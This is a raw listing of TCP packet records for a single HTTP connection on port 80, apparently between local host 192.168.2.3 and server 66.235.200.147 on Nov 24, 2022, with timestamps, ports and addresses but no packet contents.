Nov 24, 2022 12:20:03.443195105 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.443214893 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.443223000 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.443233967 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.443250895 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.443253040 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.443273067 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.443281889 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.443293095 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.443305969 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.443310976 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.443330050 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.443332911 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.443351030 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.443365097 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.443366051 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.443387032 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.443402052 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.443412066 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.443420887 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.443439960 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.443444967 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.443458080 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.443475008 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.443475008 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.443476915 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.443496943 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.443497896 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.443516970 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.443527937 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.443537951 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.443555117 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.443556070 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.443574905 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.443574905 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.443592072 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.443594933 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.443608999 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.443624973 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.443643093 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.446197033 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.461723089 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.461775064 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.461806059 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.461834908 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.461862087 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.461889029 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.461906910 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.461919069 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.461949110 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.461991072 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.461992025 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.462018967 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.462025881 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.462057114 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.462064028 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.462081909 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.462084055 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.462096930 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.462115049 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.462142944 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.462158918 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.462196112 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.462239027 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.462268114 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.462318897 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.462322950 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.462353945 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.462383032 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.462390900 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.462412119 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.462418079 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.462446928 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.462471008 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.462488890 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.462500095 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.462508917 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.462529898 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.462536097 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.462557077 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.462565899 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.462582111 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.462594986 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.462603092 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.462625980 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.462630987 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.462656975 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.462678909 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.462686062 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.462703943 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.462713957 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.462739944 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.462744951 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.462755919 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.462773085 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.462780952 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.462800980 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.462830067 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.462850094 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.462857008 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.462901115 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.462909937 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.462920904 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.462940931 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.462954044 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.462970018 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.462982893 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.463000059 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.463015079 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.463054895 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.463356018 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.463386059 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.463408947 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.463416100 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.463438988 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.463443995 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.463462114 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.463473082 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.463479996 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.463501930 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.463526011 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.463530064 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.463557005 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.463557005 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.463582039 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.463588953 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.463599920 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.463618994 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.463634014 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.463649035 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.463674068 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.463677883 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.463699102 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.463707924 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.463718891 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.463737011 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.463768005 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.463788986 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.463797092 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.463810921 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.463824034 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.463850975 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.463854074 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.463877916 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.463882923 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.463912010 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.463922977 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.463942051 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.463958025 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.463970900 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.463984013 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.463999987 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.464029074 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.464042902 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.464057922 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.464067936 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.464087963 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.464098930 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.464118004 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.464147091 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.464158058 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.464175940 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.464185953 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.464204073 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.464220047 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.464231014 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.464242935 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.464260101 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.464266062 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.464289904 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.464303017 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.464315891 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.464329958 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.464344978 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.464350939 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.464373112 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.464401960 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.464412928 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.464430094 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.464440107 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.464457989 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.464471102 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.464487076 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.464493990 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.464514017 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.464525938 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.464544058 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.464550972 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.464566946 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.464595079 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.464607954 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.464623928 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.464634895 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.464653015 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.464664936 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.464682102 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.464699984 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.464709997 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.464719057 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.464739084 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.464768887 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.464778900 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.464798927 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.464807034 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.464826107 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.464837074 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.464857101 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.464860916 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.464886904 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.464890957 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.464916945 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.464920044 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.464966059 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.465792894 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.465821028 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.465852022 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.465876102 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.465903997 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.465936899 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.465949059 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.465965986 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.465995073 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.466005087 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.466016054 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.466016054 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.466022968 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.466052055 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.466073990 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.466073990 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.466080904 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.466101885 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.466109037 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.466123104 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.466137886 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.466156960 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.466162920 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.466187000 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.466192007 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.466197968 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.466221094 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.466234922 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.466252089 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.466263056 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.466280937 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.466291904 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.466309071 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.466320992 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.466339111 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.466347933 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.466367960 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.466382027 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.466389894 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.466408014 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.466409922 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.466427088 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.466433048 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.466447115 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.466464996 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.466484070 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.466502905 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.466504097 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.466521025 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.466531992 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.466538906 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.466556072 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.466557980 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.466576099 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.466588020 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.466603041 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.466622114 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.466630936 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.466630936 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.466638088 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.466660976 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.466672897 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.466690063 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.466700077 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.466720104 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.466727972 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.466751099 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.466758966 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.466780901 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.466809988 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.466824055 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.466839075 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.466866970 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.466867924 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.466907024 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.466912031 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.466919899 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.466944933 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.466972113 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.466998100 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.467003107 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.467024088 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.467031002 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.467056036 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.467061043 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.467077017 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.467097998 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.467118979 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.467118979 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.467138052 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.467148066 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.467159033 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.467168093 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.467178106 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.467186928 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.467195988 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.467206001 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.467216015 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.467226982 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.467233896 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.467252016 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.467255116 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.467278957 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.467283010 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.467305899 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.467305899 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.467308044 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.467329025 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.467334032 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.467348099 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.467361927 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.467365980 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.467384100 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.467389107 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.467406988 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.467410088 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.467432022 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.467439890 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.467463017 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.467467070 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.467495918 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.467504025 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.467521906 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.467523098 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.467539072 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.467551947 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.467581987 CET	80	49710	66.235.200.147	192.168.2.3
